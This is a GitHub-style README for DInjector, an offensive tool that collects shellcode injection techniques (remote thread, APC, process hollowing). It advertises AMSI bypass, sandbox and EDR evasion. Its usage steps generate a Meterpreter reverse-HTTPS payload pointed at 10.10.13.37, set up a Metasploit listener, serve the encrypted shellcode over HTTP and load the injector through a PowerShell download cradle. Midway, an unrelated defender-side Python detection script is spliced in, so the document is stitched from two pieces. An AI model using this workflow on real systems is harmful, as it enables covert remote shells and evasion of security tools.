DInjector: Collection of shellcode injection techniques
This repository is an accumulation of my code snippets for various shellcode injection techniques using the fantastic D/Invoke API by @TheWover and @FuzzySecurity.
Features:
- Fully ported to D/Invoke API.
- Encrypted payloads which can be invoked from a URL or passed in base64 as an argument.
- Built-in AMSI bypass based on the @rasta-mouse method.
- Sandbox detection & evasion.
ℹ️ Based on my testing, the DInvoke NuGet package itself is flagged by many commercial AV/EDR solutions when included as an embedded resource via Costura.Fody (or similar approaches), so I've shrunk it a bit and included it from source to achieve better OpSec.
Modules
- FunctionPointer Allocates an RWX memory region, copies the shellcode into it, and executes it like a function.
- FunctionPointerV2 Sets RWX on a byte array and executes it like a function.
- CurrentThread Injects shellcode into the current process. Thread execution via NtCreateThreadEx.
- RemoteThread Injects shellcode into an existing remote process. Thread execution via NtCreateThreadEx.
- RemoteThreadSuspended Injects shellcode into an existing remote process and flips memory protection to PAGE_NOACCESS. After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ. Thread execution via NtCreateThreadEx.
- RemoteThreadAPC Injects shellcode into a newly spawned remote process. Thread execution via NtQueueApcThread.
- RemoteThreadContext Injects shellcode into a newly spawned remote process. Thread execution via SetThreadContext.
- ProcessHollow Injects shellcode into a newly spawned remote process. Thread execution via NtResumeThread (hollowing with shellcode).
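As an added, defender-side example that is not part of DInjector: a small Python heuristic that flags the cross-process pattern the RemoteThread* modules rely on (a handle opened on the target with write and create-thread rights, followed by a remote thread starting at an address not backed by any loaded module). The event records are constructed, simplified Sysmon-style entries (ID 10 ProcessAccess, ID 8 CreateRemoteThread); the field names mirror Sysmon but all values are made up for illustration.

```python
"""Correlate process-access rights with remote thread creation to spot injection.
Events are constructed, simplified Sysmon-style records (assumption, not real logs)."""

# Windows process access rights (winnt.h) a remote injector needs on the target
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed sample log: one benign handle open (query-only), one full-access
# handle followed by a thread started in unbacked memory, one normal thread.
SAMPLE_EVENTS = [
    {"id": 10, "src": "explorer.exe", "tgt": "notepad.exe", "pid": 4120,
     "GrantedAccess": "0x1000"},
    {"id": 10, "src": "powershell.exe", "tgt": "notepad.exe", "pid": 4120,
     "GrantedAccess": "0x1F0FFF"},
    {"id": 8, "src": "powershell.exe", "tgt": "notepad.exe", "pid": 4120,
     "StartModule": ""},
    {"id": 8, "src": "svchost.exe", "tgt": "notepad.exe", "pid": 4120,
     "StartModule": "ntdll.dll"},
]


def wants_injection_rights(granted_access: str) -> bool:
    """True when the handle carries every right needed to write memory and start
    a thread in another process (hex mask as logged in Sysmon GrantedAccess)."""
    return int(granted_access, 16) & INJECT_MASK == INJECT_MASK


def find_injections(events):
    """Return alert strings for each remote thread whose start address is not
    backed by a loaded module (empty StartModule) and whose creator previously
    obtained injection-capable rights on the same target process."""
    armed = set()  # (source image, target pid) pairs holding injection rights
    alerts = []
    for ev in events:
        key = (ev["src"], ev["pid"])
        if ev["id"] == 10 and wants_injection_rights(ev["GrantedAccess"]):
            armed.add(key)
        elif ev["id"] == 8 and key in armed and not ev["StartModule"]:
            alerts.append(f"{ev['src']} -> {ev['tgt']} (pid {ev['pid']}): "
                          "remote thread at address not backed by a module")
    return alerts


if __name__ == "__main__":
    for line in find_injections(SAMPLE_EVENTS):
        print(line)
```

A real pipeline would also key on the source process id rather than image name, and would treat the PAGE_NOACCESS-then-executable protection flip used by RemoteThreadSuspended as a separate signal where the telemetry exposes memory protection changes.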
Download
git clone https://github.com/snovvcrash/DInjector.git
Use
- Compile the project in VS.
- Generate shellcode for your favourite C2:
~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin
- Encrypt the shellcode:
~$ encrypt.py shellcode.bin -p 'Passw0rd!' -o enc
- Serve the encrypted shellcode and prepare C2 listener:
~$ sudo python3 -m http.server 80
~$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run"
- Use a PowerShell download cradle to load DInjector.dll as a System.Reflection.Assembly and execute it from memory.
Required global arguments:
| Name | Example Value | Description |
|---|---|---|
| /am51 | true, false | Applies AMSI bypass |
| /sc | http://10.10.13.37/enc | Sets shellcode path (can be loaded from a URL or as a Base64 string) |
| /password | Passw0rd! | Sets password to decrypt the shellcode |
Copyright (c) 2021, snovvcrash
All rights reserved.
Source: https://github.com/snovvcrash/